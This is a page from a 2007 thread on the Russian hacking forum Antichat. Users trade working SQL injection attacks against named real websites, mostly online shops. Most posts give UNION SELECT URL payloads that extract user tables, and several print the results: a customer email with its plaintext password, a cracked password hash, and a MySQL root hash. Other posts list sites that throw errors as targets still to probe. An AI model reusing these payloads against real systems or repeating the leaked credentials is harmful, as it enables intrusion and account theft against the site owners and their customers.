ANTICHAT
Страница 51 из 1604 « Первая < 41 47 48 49 50 51 52 53 54 55 611011515511051 > Последняя »
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=21336)

}{0TT@БЬ)Ч 14.02.2007 02:18
хмм и админка на виду:)
Total Members: 3776

guest3297 14.02.2007 03:11
2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...

}{0TT@БЬ)Ч 14.02.2007 03:16
Цитата:
Сообщение от [ cash ]
2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...
или через order by

Thanat0z 14.02.2007 03:37
Цитата:
Сообщение от [ cash ]
2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...
я знаю, скриптик выкладывали в "полезные скрипты". Иногда просто нет предпосылок в виде "не то количество колонок", и такие я руками пробую, а иначе скриптом после 10 где-то. Если не катит через юнионселект, пробую через ордербай

pop_korn 14.02.2007 04:31
http://www.eclectichomeschool.org/support/state.asp?stateid=(select+top+1+table_name+from+in formation_schema.tables)--

Thanat0z 14.02.2007 05:59
Инет-магазины (почти все):

Не нашел таблиц, лоадфайл вроде не работает:
Код:
__http://www.magic-pony.com/product.php?id=-1894+union+select+1,2,3,4,5,6,user,8,9,10,11,12,13,14/*&category=art
__http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,4,user(),6,7/*
ошибки:

Код:
__http://amvets.fundlinkllc.com/showcategory.php?id=61'
__https://shop.invictusnetworks.com/detail.php?id=16026'
__http://www.usenetportal.com/detail.php?id=713'
__http://www.alicebxl.com/artsale.php?id=16'
__http://www.rocbattle.com/battle_details.php?id=37519'
странное чувство, что здесь есть скуль, сам не нашел:
Код:
__http://www.juniperresearch.com/shop/viewreport.php?id=-28'
__http://www.juniperresearch.com/shop/viewpressrelease.php?pr=-44'

n0ne 14.02.2007 09:41
Thanat0z,

Код:
http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,concat(email,0x3a,password),5,6,7+from+customers/*
wes@joedesigns.com:flash62

тут email=login :)

ice1k 14.02.2007 16:07
Код:
http://www.mikeosx.com/newsphp/show.php?id=-99+union+select+1,2,3,4,concat(name,0x3a,pass),6,7,8,9,10+from+users+limit+1,1/*
powermic:52609e00b7ee307e79eb100099b9a8bf
powermic:fingerprint
Код:
http://www.foxreality.com/show.php?id=-99+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x545f7573657273+limit+23,1/*
etc...
=\

злюка 14.02.2007 19:05
_http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,15,6,1 7/*

как всегда с названием таблци юзверей проблема((

n0ne 14.02.2007 19:50
Код:
http://www.nregion.com/txt.php?i=-8943+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9+from+mysql.user/*
root:*2E4549A9308C1DFA3E3A1645E3CFD8E787134CBC


Время: 06:11
Страница 51 из 1604 « Первая < 41 47 48 49 50 51 52 53 54 55 611011515511051 > Последняя »
Показывать 40 сообщений этой темы на одной странице